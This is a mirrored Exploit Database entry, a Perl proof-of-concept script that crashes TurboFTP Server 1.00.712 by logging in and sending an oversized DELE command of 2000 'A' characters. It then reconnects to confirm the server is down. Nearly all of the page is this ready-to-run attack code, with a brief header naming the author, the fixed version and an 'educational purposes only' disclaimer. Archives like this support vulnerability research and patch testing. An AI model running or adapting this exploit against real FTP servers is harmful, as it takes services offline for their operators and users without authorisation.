TurboFTP Server 1.00.712 – Remote Denial of Service

• Exploit Database
• 124 阅读

• 作者： corelanc0d3r
  日期： 2010-01-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11131/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

  # Exploit Title : TurboFTP Server 1.00.712 Remote DoS # Date: 30 december 2009 # Author: corelanc0d3r (corelanc0d3r[at]gmail{dot}com) # Bug found by: corelanc0d3r (corelanc0d3r[at]gmail{dot}com) # Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe # Version : 1.00.712 # Issue fixed in: 1.00.720 # OS: Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln: DoS # Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse # # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # # # Code : print "|------------------------------------------------------------------|\n"; print "| __ __ |\n"; print "| _________________/ /___ _____ / /________ _____ ___|\n"; print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n"; print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n"; print "||\n"; print "| http://www.corelan.be:8800 |\n"; print "||\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";   use IO::Socket;   if ($#ARGV ne 3) { print "\nusage: $0 <targetip> <targetport> <user> <password>\n"; exit(0); }   my $user=$ARGV[2]; my $pass=$ARGV[3];   print " [+] Preparing DoS payload\n"; my $payload = "A" x 2000; print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n"; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto=> &apos;tcp&apos;);   $ftp = <$sock> || die " [!] *** Unable to connect ***\n"; print " ** $ftp"; $ftp = <$sock>; print " ** $ftp"; print " [+] Logging in (user $user)\n"; print $sock "USER $user\r\n"; $ftp = <$sock>; print " ** $ftp"; print $sock "PASS $pass\r\n"; $ftp = <$sock>; print " ** $ftp"; print " [+] Sending payload\n"; print $sock "DELE ".$payload."\r\n"; $ftp = <$sock>; print " ** $ftp"; print " [+] Payload sent, now checking FTP server state\n"; $sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto=> &apos;tcp&apos;); my $ftp2 = <$sock2> || die " [+] DoS successful\n"; print " [!] DoS did not seem to work\n"; print " ** $ftp2\n";